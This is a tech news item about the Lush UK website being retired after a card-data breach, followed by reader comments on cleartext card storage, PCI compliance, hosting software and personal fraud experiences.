Luxury cosmetics firm Lush has ditched its UK website in response to a sustained hacking attack which left users vulnerable to credit card fraud. The firm warns that credit card details submitted to the Lush.co.uk site between 4 October and 20 January may have been compromised by the assault by unknown hackers. Customers are …
I can just imagine the development log:
Version 1.1.23 Hacked
Version 1.1.24 Added one line fix to close security hole.
Version 1.1.25 Changes CSS skinning slightly so site looks subtly different
Version 2.0.0 UpperManagement decided old site must be 'retired' so upped version number to 2.0.0 and have told upper management that it is a new website (pointed at the slightly different colours and page layout when they questioned this)
an uneducated guess
Once the website went live, they "retired" the person who developed it (or their mum won't let them do any more freelancing until the school holidays). Now they need to get their security sorted out that person, or the Post-It they wrote the documentation on, is no longer available.
Why on earth...?
As someone affected by this, I want to know why my card details were being stored in cleartext, rather than being encrypted. Having an SSL link to pass my details when shopping is bugger all use if they're going to held in-the-clear on a server at the other end. Not even a basic hash...?
I wouldn't worry about the hashing
They're probably printed out on a nightly report that either gets left on a desk for the cleaners or chucked in the normal waste.
Clear or not...
They may not have been stored in the clear, but there would need to be a system to decrypt them, maybe this was hacked too?
Credit Card Details
I hope their expanded explanation will cover their reasoning for storing unencrypted card details.
a complete rewrite?
Its the only way, all that shiny new code will be free of bugs and vulnerabilities, new code always is.
It also implies that as they are pulling the whole lot and not just taking it down to fix it then the site was awful to start with.
So, who signed off the original?
Who didn't test it? (are there not tools for this?)
we take off and nuke the site from orbit.
it's the only way.
I like their bath bombs - terrific stuff! But their on-line customer safety strategy stinks!
having had to work throught this forwards and backwards across all our operating companies setups, I can't see how on earth this is even possible. Which means Lushs payment handler will make them foot the bill for any breaches.
Unencrypted car details?
I hope someone is recreationally fired for that mistake.
I *think* if the card issuers find the data has not been held securely they can not only force Lush to cover the losses, but they can refuse to offer card services to the company.
No card services
that is probably the reason the article states that the new site will initially only be accepting paypal as a payment option.
I know that in systems I work with the card details (number, dates & cvn) are never written to the server, the only thing that gets written is the last 4 digits of the card number, the card type, the outcome of the transaction and the transaction reference number (example 3754,Visa,Success,1/35325/234)
Tat seller = Good back office? Not!
What incentive would a vendor of over-perfumed tat (what the fuck do we need bath bombs for?) have to prudently look after other people's credit card details?
wtf do we need bath bombs for
"what the fuck do we need bath bombs for"
Um, excuse me but they actually make for great bath plug-hole blockers!
Got the email this morning, I like the way they came clean...(no pun intended) their original site sucked and the payment side hardly worked at all, seemed to be based on Joomla and virtuemart, put together by a college kid.
Anyway, took the chance (wife, xmas etc) and got stung by it.. loads of xbox live payments, online gambling and a personal dating site which just about sums up the pricks that did the hack. Few other transactions which appeared to be from around the Poole area so this would link up with where Lush are based, maybe an inside job???
Bank typically dont give a shit, but from the transactions it doesnt look particularly difficult to track these twats down if they pulled their finger out.
Someone used my credit card details to buy a Sports Illustrated magazine subscription. I used the reference details on my credit card bill to log in to the guy's account on the Sports Illustrated website and get the subscription delivery address in Colorado - presumably the perp's home address. I live in the UK but I had used the card in a nearby Gap store in Colorado shortly before.
So I called the bank again to give them the address, but their response was total disinterest. I think they're only interested if there's a bonus in it for them.
Denver PD would presumably be rather interested
They even have the phone number on the website
A nice simple collar for them, helps up the crime solving stats, could uncover something better.
They might even send you some free doughnuts as a thank you
Having also been through PCI, with several providers and setups I also cannot see how this is possible. Surely the most basic vulnerability tests would have picked this up?
When filling out the SAQ did they just skip past the bit about the security or encryption around their database. Did they even declare that they store these details? That should have unleashed a world of hurt with their PCI.
I for one will always go down the route of never touching, seeing or being anywhere near a customers card details. Hire a PCI compliant payment provider, and just have them tell you when the money has been taken.
Not sure what Tier Lush are but may not be able to self-assess.
Alanis Morissette would be proud
Old website removed because of concerns over fraudulent financial activity, new website replaces this with PayPal.
Paris, because she's also prone to having her holes exposed online.
Someone in government or the civil service does this and the public and media are baying for blood / sacking / hanging.
But a private company does and it barely gets a mention, other than in the tech journals.
Thats because ...
When someone in government or the civil service does this and the public and media are baying for blood / sacking / hanging, nothing happens.
When a private company does it, someone gets sacked.
Lush - Luxury?
Have you seen their products?
What do you expect IIS?!
Oh dear....netcraft 'what's this site running' information.: (no wonder they are retiring it)
Redstation Internet Ltd Internet Web Hosting 184.108.40.206 Windows 2000 Microsoft-IIS/5.0 5-Jun-2007
and it looks like their splash page has just been changed to
Linux Apache 21-Jan-2011 220.127.116.11 United Hosting IPv4 Assignment
That totally explains the trapster hack too!
Linux Apache/2.2.3 (CentOS) 21-Jan-2011 18.104.22.168 Trapster.com
Devil is in the details
Do we know when it occurred or how? You cannot blame Linux for that unless you have data for it. I cannot say MS IIS is at fault for lush as well, since details are missing. Still it is interesting if they switched to Linux recently.
That was my point, really, although my post ended up sounding like I was participating in a fanboy war. I would be willing to bet in both cases that the hack was not due to a flaw in the underlying stack, but some foolishness at the application level.
...nuke the entire site from orbit. It's the only way to be sure.
Sucks to have your website hacked. Sounds like failure to filter input but all over the site and hacks on top of hacks. If they customised Joomla then keeping it up to date will be tricky at best. Clearly they looked at the code and decided it was better to start again.
It's why I use my own code site-wide. A faff but I know the site inside-out. And I enjoy the programming. The small pleasures of watching fruitless probes for a non-existant CMS make it all worthwhile...
"The small pleasures of watching fruitless probes for a non-existant CMS make it all worthwhile..."
I concur. I see it all the time.
Storing credit card details
Why did they even need to store the full card details? Once the payment has been authorised just keep the (encrypted) card number (in case of a charge-back) and delete the expiry date and security digits. The card number alone would be worthless to the hackers.
storing credit cards online
Why in this day and age are they still storing credit cards online and in the clear. What have all the innovators being doing this past decade.
Am I being thick?
I've not seen anything which says the attackers picked up passwords from a file or from the database in plain text. This attack would be easily achievable using XSS or simple insertion of code into the PHP on the server at the point the browser commits them. Said code could email to a drop box account or access a remote server to upload the card details.
Without auditing of all live files against the database, an html file could have had a remote scripting attack in it for months without being detected, especially if the site design wasn't changed.
Storing credit cards
I worked, albeit for 3 months, for a large company who did payment processing. Credit cards were stored in a SQL database in cleartext along with the name and address of the customer. This SQL database was visible on the internet and was about 8 characters away from being hacked (given that the sa account could be used). I think the only reason they got away with it is because nobody has ever heard of them (they only handle the payments) and thus didn't attack them. I left when I realised I was the only developer who seemed to think there was anything wrong with much of what they did.
If you foillow where the money goes then an attack on Lush is likely to be one of the Climate Change Deniers computerised 'complaints', much like the so-called 'leak' of the University of East Anglia emails. Corporate malfeasance is often the simplest explanation.
Within hours of using my boss's Mastercard to buy a network switch on-line at bargain basement prices, it ended up being used to attempt to buy high-end cosmetics at a bricks & mortar 2,800 km. from here. No, the boss had never been there. No, he doesn't have a mistress there. So the guys who cracked the high-end cosmetics boutique may have been simply trying to avenge us! The Fountain Valley, CA beauty shop had the decency to call and check since the bill-to / ship-to were so much at odds.
I guess we humans are good for something after all....
Paris, just cuz.
This company isn't in the US so I can't be too harsh but I can say it's good to see we still have companies out there that have no idea how to manage their security yet they are accepting credit cards through the internet.
Credit cards truly were a good idea. The card companies make a gazillion dollars while basically sharing no liability. The merchants in general are sacked with the expenses of keeping in 'compliance' yet things like this still seem to happen.
What a joke..
"24 hour security monitoring has shown us that we are still being targeted and there are continuing attempts to re-enter." OBVIOUSLY, why wouldn't expect this? Any front-end website on the internet will face constant attacks, i bet they came to this conclusion after checking attempted ssh logins, genius!
"We Believe hacking is a serious crime which steals large amounts of money and disrupts the lives of cardholders." No.. really?
"We Believe that hacking erodes the trust between businesses and their customers and creates a climate of fear around online ordering." No, just no. Not investing the correct amount of resources in your online business will erode the trust between yourself and your users.
The climate of fear that they talk about has come around because of businesses like themselves, business that just don't take these kind of issues seriously. Like investing in a decent web company.
I hope they get sued for this massive breach of user data.